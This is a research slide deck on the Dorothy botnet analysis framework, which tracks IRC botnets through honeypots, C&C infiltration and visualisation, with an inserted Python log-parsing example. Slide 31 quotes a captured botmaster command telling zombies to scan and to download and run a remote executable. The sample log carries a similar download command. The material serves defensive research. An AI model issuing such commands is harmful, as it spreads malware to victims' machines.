
An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization - PowerPoint PPT Presentation



  1. An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization
     Marco Riccardi – Italian Chapter - The Honeynet Project
     Marco Cremonini – Dept. of Information Technology – Università di Milano

  2. • Defining the problem: IRC botnets
     • Defining the goal to achieve
     • The proposed solution: the Dorothy Framework
     • The realized proof of concept: honey-dorothy
     • Results
     • Case study: the siwa botnet
     • Workplan
     • Conclusions

  3. • Botnets are considered one of the most dangerous threats
       ◦ Hard to keep pace with their evolution
       ◦ Hard to protect against their attacks
       ◦ Hard to mitigate
     • The time between Command and Control (C&C) identification and botnet mitigation is typically too long
       ◦ Technical issues
       ◦ Legal issues

  4. • A mitigation plan should be as quick as possible
     • Automation is required
     • …otherwise, human interaction is needed
       ◦ Considering the social context (legal, culture, etc.)
       ◦ All the countermeasures provided by ISPs/LEOs (blacklisting, DNS update, etc.) have to be clearly justified before their execution

  5. • A mitigation plan should be as quick as possible
     • Automation is required
     • …otherwise, human interaction is needed
       ◦ Considering the social context (legal, economic, operational, etc.)
       ◦ All countermeasures provided by ISPs/LEOs (blacklisting, DNS update, etc.) must be clearly justified before their implementation
     Goal: developing a framework that automatically provides all the information needed by an ISP/LEO to activate a mitigation strategy

  6. • Automated framework for IRC botnet analysis
       ◦ Automatic malware acquisition and analysis
       ◦ Automatic C&C IRC channel infiltration
       ◦ Automatic reporting of activity status
     • Interactive graphic front-end
     • Real-time information about monitored C&Cs
       ◦ Defenders can use this information to develop timely countermeasures to mitigate the risks
     • Customizable
       ◦ Defenders can be alerted when botnet activity is detected in their network

  7. • Malware Collection Module
     • Virtual Honeypot Injection Module
     • Network Analysis Module
     • Data Extraction Module

  8. • Infiltration Module
     • Geolocation Module
     • Live Data Extraction Module
     • Data Visualization Module
     • Web Graphical User Interface

  9. • Proposed proof of concept
     • Developed using the bash scripting language
       ◦ Fully compatible with POSIX systems
       ◦ Fully automated
     • Developed to be modular
       ◦ Easy integration with other tools
       ◦ Customizable
     • 90% of its components are open source
     • The Virtualization Module has been developed on VMware
       ◦ A migration to VirtualBox is ongoing

  10. • Low-interaction honeypots (nepenthes)
      • All honeypots upload their malware samples to a central malware repository
      • Support for the Mwcollect Alliance repository has recently been added
      • Integration of a malware analysis module (static/dynamic) is ongoing

  11. • The virtualization environment has been developed on VMware
      • vmtools supports the scripting implementation
      • The malware is executed on a virtual machine (Windows XP SP2)
      • After three minutes the VM is reverted to its original snapshot

  12. • Inspects the zombie's network behavior during the three minutes of infected-VM execution
      • The network traffic is sniffed with the tcpdump tool
      • The output is stored in a dump file and sent to the next module

  13. • The goal of this module is to extract all relevant information about C&Cs
      • The extracted information is used for botnet classification:
        ◦ C&C IP addresses
        ◦ C&C satellites
        ◦ Associated hostnames
        ◦ Hostnames resolved by DNS servers

  14. Infiltrate, Observe, Report
      • IRC-drone
        ◦ Fully written in bash
        ◦ Multichannel support
        ◦ Auto-responds to PING requests
        ◦ The drone injects, as is, all the IRC commands extracted from the traffic generated by the VM zombies
          ▪ Compatible with non-IRC-compliant C&Cs
      • The connection toward the C&C is anonymized through the TOR network

  15. • All the data received from and sent to C&Cs is logged into txt files
      • Instant notification by email when:
        ◦ The topic changes
        ◦ A new command is issued by the botmaster
        ◦ A MODE option is modified
      • A full module re-engineering is ongoing
        ◦ Multiplatform
        ◦ Support for more onion networks

  16. • Geolocation information gives an approximate geographical location of C&Cs
        ◦ Useful for considering the social context
        ◦ Useful for understanding which law enforcement officer to notify
      • Provided by GeoLite City
        ◦ Free, good approximation

  17. • All log files generated by the IRC-drone are parsed:
        ◦ Topic extraction
        ◦ Botmaster nickname / user host extraction
        ◦ Time delay calculation
          ▪ Between each topic modification
          ▪ Between each PING request (i.e. heartbeat)

  18. Parameters: IPs, Hosts, Ports, Zombies, Malwares, Chans, Satellites, ALL-Hosts, Mail Addr

  19. Visualization legend (shape / color → meaning; the colors are not recoverable from the slide text):
      Circle   → Targets
      Circle   → C&C
      Circle   → Satellites
      Circle   → Spreading
      Circle   → Spam
      Square   → Services
      Triangle → Source

  20. Visualization legend as on slide 19 (Circle: Targets, C&C, Satellites, Spreading, Spam; Square: Services; Triangle: Source)

  21. Visualization legend as on slide 19 (Circle: Targets, C&C, Satellites, Spreading, Spam; Square: Services; Triangle: Source)

  22. “Overview first, zoom and filter, then details on demand” – B. Shneiderman, The Eyes Have It: A Task by Data Type Taxonomy for Information Visualizations.

  23. • Tested for a period of 27 days between January and March 2009
      • Two public IPs used for malware acquisition
      • 3900 malware samples downloaded
        ◦ 304 unique
        ◦ 562,657 Mb downloaded
      • 16 unique C&Cs classified
        ◦ 50 IRC channels monitored
      • 8992 unique public IPs identified as zombies

  24. • Formed by 5 C&C servers
        ◦ 2 located in China
        ◦ 2 located in Canada
        ◦ 1 located in Holland
      • 7 different channel names used
        ◦ #siwa was the most used
      • 37 different C&C satellites providing a botnet updating service through HTTP
      • 42 host names related to siwa IP addresses
      • 4346 unique IP addresses identified as zombies

  25. • Redesign of the information flow management
        ◦ Information repository stored in a relational database
      • Evaluate developing the core engine in other programming languages
      • Integration of a malware analysis module
        ◦ Dynamic and static analysis
      • Virtual Honeypot: migration to VirtualBox

  26. • New module design and realization
        ◦ A module for analyzing P2P botnets
        ◦ A spam-trap implementation is ongoing
      • Development of a new IRC Drone
        ◦ Multiplatform, distributed

  27. • Data visualization tuning
        ◦ Investigating new ways of representing botnet data
      • Developing a new web interface
        ◦ More dynamic
        ◦ Multi-user / user-customizable
      • Improving the notification process
        ◦ Mailing list
        ◦ Web 2.0 communication channels (Twitter, feeds, blogs, ...)

  28. • The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter
      • Today, different contributors support the project:
        ◦ Two researchers of the University of Pavia are contributing by integrating their own botnet analysis tools (H.I.V.E) with honey-dorothy
        ◦ Three students from the University of Milan are developing new malware analysis modules
        ◦ The IHP Chapter has ten active participants who are contributing to the realization of a new version of the botnet analysis framework

  29. (Same content as slide 28)
      ….we hope to receive your support too!

  30. The Italian Honeynet Chapter – www.honeynet.it
      Marco Riccardi – marco.riccardi [at] honeynet [dot] it
      Marco Cremonini – marco.cremonini [at] unimi [dot] it

  31. Botmaster execution request:
        ##pi## :* ipscan s.s dcom2 -s ][ * wormride on -s ][ * download http://72.xxx.xxx.xxx/mb2.exe -e –s
      Zombies' response:
        72.xxx.xxx.xxx:2293 --> :QfNUXNcm!~xqbmgz@92.xxx.xxx.xxx PRIVMSG ##RUSSIA## :-041- Running FTP wormride thread
        72.xxx.xxx.xxx:2293 --> :Tdkzdtwh!~bxoluj@mna75-4-82-225-77-1.yyy.yyy.net PRIVMSG ##russia## :-04wormride- 1. tftp transfer to 82.xxx.xxx.xxx complete

  32. • Bar charts: number of DNS queries executed by the analyzed malware, grouped by C&C
      • Pie charts: number of DNS queries

  33. • Topic activity: average time between TOPIC changes
      • C&C heartbeat: average time between two PING requests
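The log parsing described on slide 17 (topic extraction, botmaster nick/host extraction, time delays between TOPIC changes and between PING heartbeats, which feed the charts on slide 33) as an added Python example; this is not honey-dorothy's own bash code. It assumes a hypothetical IRC-drone log format: the "ip:port --> raw IRC line" layout shown on slide 31, prefixed with an ISO timestamp that the deck does not show; the sample log lines are constructed.

```python
import re
from datetime import datetime
from statistics import mean

# Constructed sample of IRC-drone log lines. The "ip:port --> raw IRC line" layout
# follows slide 31; the leading ISO timestamp is an assumed addition needed for
# interval calculation. IPs are documentation ranges.
SAMPLE_LOG = """\
2009-02-10T10:00:00 10.0.0.1:6667 --> PING :irc.example.test
2009-02-10T10:00:05 10.0.0.1:6667 --> :master!~op@203.0.113.7 TOPIC #siwa :.download http://203.0.113.9/u.exe
2009-02-10T10:02:00 10.0.0.1:6667 --> PING :irc.example.test
2009-02-10T10:03:05 10.0.0.1:6667 --> :master!~op@203.0.113.7 TOPIC #siwa :.scan stop
2009-02-10T10:04:00 10.0.0.1:6667 --> PING :irc.example.test
2009-02-10T10:04:30 10.0.0.1:6667 --> :bot1!~x@198.51.100.4 PRIVMSG #siwa :-041- Running thread
"""

# <timestamp> <ip:port> --> <raw IRC message>
LINE_RE = re.compile(r'^(\S+) (\S+) --> (.*)$')
# :nick!user@host COMMAND target [:trailing]
PREFIX_RE = re.compile(r'^:([^!\s]+)!([^@\s]+)@(\S+) (\w+) (\S+) ?:?(.*)$')


def _avg_gap_seconds(times):
    """Average distance between consecutive timestamps, or None if fewer than two."""
    if len(times) < 2:
        return None
    return mean((b - a).total_seconds() for a, b in zip(times, times[1:]))


def parse_drone_log(text):
    """Extract topics, botmaster identities and heartbeat/topic intervals from drone log text."""
    topics, masters, topic_times, ping_times = [], set(), [], []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip lines that do not follow the assumed layout
        ts = datetime.fromisoformat(m.group(1))
        msg = m.group(3)
        if msg.startswith('PING'):
            ping_times.append(ts)  # server heartbeat the drone must answer
            continue
        p = PREFIX_RE.match(msg)
        if p and p.group(4) == 'TOPIC':
            nick, user, host, _cmd, chan, topic = p.groups()
            topics.append((chan, topic))
            masters.add(f'{nick}!{user}@{host}')  # whoever sets the topic is the botmaster
            topic_times.append(ts)
    return {
        'topics': topics,
        'botmasters': sorted(masters),
        'avg_topic_delay_s': _avg_gap_seconds(topic_times),
        'avg_ping_delay_s': _avg_gap_seconds(ping_times),
    }
```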

  34. • A full module re-engineering is ongoing
      • The new drone will be multiplatform
      • Anyone can support the infiltration process
      • It will support more than one onion network
      • It will send its logs to a central log concentrator
      • Integrity and confidentiality have to be managed accurately
